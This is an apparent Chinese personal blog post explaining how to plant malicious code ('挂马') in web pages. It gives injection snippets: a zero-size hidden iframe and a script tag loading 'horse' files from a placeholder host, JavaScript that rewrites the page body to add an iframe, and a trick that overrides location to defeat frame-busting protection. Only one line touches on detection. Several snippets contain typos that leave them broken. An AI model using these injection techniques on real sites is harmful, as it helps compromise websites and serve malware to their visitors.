夜火博客 个人的碎碎念收集箱

详解挂马方法和技巧

1.挂马的N种方法

(1) HTML挂马法
常规的HTML挂马方法一般是在网页中插入一条iframe语句,像<iframe src=http://www.xxx.com/horse.html width=0 height=0></iframe>。查看站点是否被挂,一般是查找一下关键词iframe。

(2) 再隐藏一点的就是js挂马了。
像再原来的网页中写入<script str=http://www.xxx.com/horse.js></script>,horse里的js写法一般为 document.write(’http://www.xxx.com/horse.html’>;,或者专业一点的写法是 top.document.body.innerHTML  = top.document.body.innerHTML + ‘ <inframe src=”http://www.xxx.com/horse.htm/”></iframe>’;。不过第2种写法要注意:是原来的网页种要有body标签。

(3)......

iframe的防插与强插

iframe的防插与强插,网上通用的防插那版是(子):

if(top.location != self.location){
top.location = self.location;
}

强插方案为(父):
 

var location="";

其中这个location是对被赋值的top.location方法的覆盖,导致方法失效。

......

标签: iframe技术类

作者:夜火 分类:技术文章 浏览:2507 评论:5